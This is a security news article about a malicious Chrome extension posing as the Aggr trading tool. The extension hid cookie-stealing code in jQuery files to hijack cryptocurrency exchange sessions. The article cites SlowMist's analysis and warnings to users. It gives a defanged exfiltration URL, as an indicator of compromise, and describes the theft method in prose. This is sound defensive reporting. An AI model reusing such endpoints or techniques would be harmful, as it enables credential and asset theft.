In a sophisticated cyber attack that has raised alarms within the cryptocurrency community, a malicious Chrome extension has been identified, which has been exploiting users’ privacy and financial security. The extension, which masquerades as a legitimate tool, has been found to steal users’ cookies and cryptocurrency assets.
The Discovery of the Malicious Extension
The revelation of the malicious extension came to light on March 1, 2024, when a Twitter user, @doomxbt, reported an unusual activity in their Binance account, suggesting a possible theft of funds. Initially, the incident did not garner much attention. However, on May 28, 2024, Twitter user @TreeofAlpha discovered that the victim had installed a fraudulent Aggr extension from the Chrome Web Store, which was highly rated and seemed legitimate.
The Mechanics of the Attack
Upon downloading and analyzing the extension, the security team from SlowMist, a cybersecurity firm, found that the extension could steal all cookies from websites visited by the user. Furthermore, the extension was found to have been promoted by influential individuals two months prior, indicating a well-coordinated attack.
Analysis of the Malicious Code
The analysis revealed that the extension used two versions of jQuery, and the team focused on the malicious code within the jQuery files. They discovered that the extension was sending cookies to an external server via the link: https://aggrtrade-extension[.]com/statistics_collection/index[.]php.
The Target Audience and Attack Strategy
The extension was designed to target cryptocurrency users, and the attackers aimed to steal their assets through a man-in-the-middle attack. If the attackers managed to obtain users’ authentication credentials, they could hijack cookies and conduct transactions on behalf of the users, thereby stealing their cryptocurrency assets.
The Origin of the Attack
Further analysis of the malicious website, aggrtrade-extension[.]com, revealed that the attackers had been planning the attack for three years. The hackers, who were likely based in Russia or Eastern Europe, deployed the attack four months ago and began promoting it on Twitter, waiting for unsuspecting users to download the extension.
The Response and Prevention Measures
SlowMist has issued a warning to the public, emphasizing the risks associated with browser extensions and the importance of careful scrutiny before installing any such tool. They also advised users to be cautious of private messages from individuals posing as legitimate and well-known projects, often using the guise of funding or promotion to target content creators for fraud.
The Importance of Cybersecurity Awareness
This incident serves as a stark reminder of the importance of cybersecurity awareness in the digital age, especially within the cryptocurrency community. Users are advised to remain vigilant and to ensure that any tools they install are safe and do not pose a risk to their privacy and financial security.
Conclusion
The discovery of the malicious Chrome extension is a testament to the evolving nature of cyber threats and the importance of proactive cybersecurity measures. As technology advances, so do the methods employed by cybercriminals. It is crucial for users to stay informed and to adopt best practices to protect themselves from such attacks.
Views: 0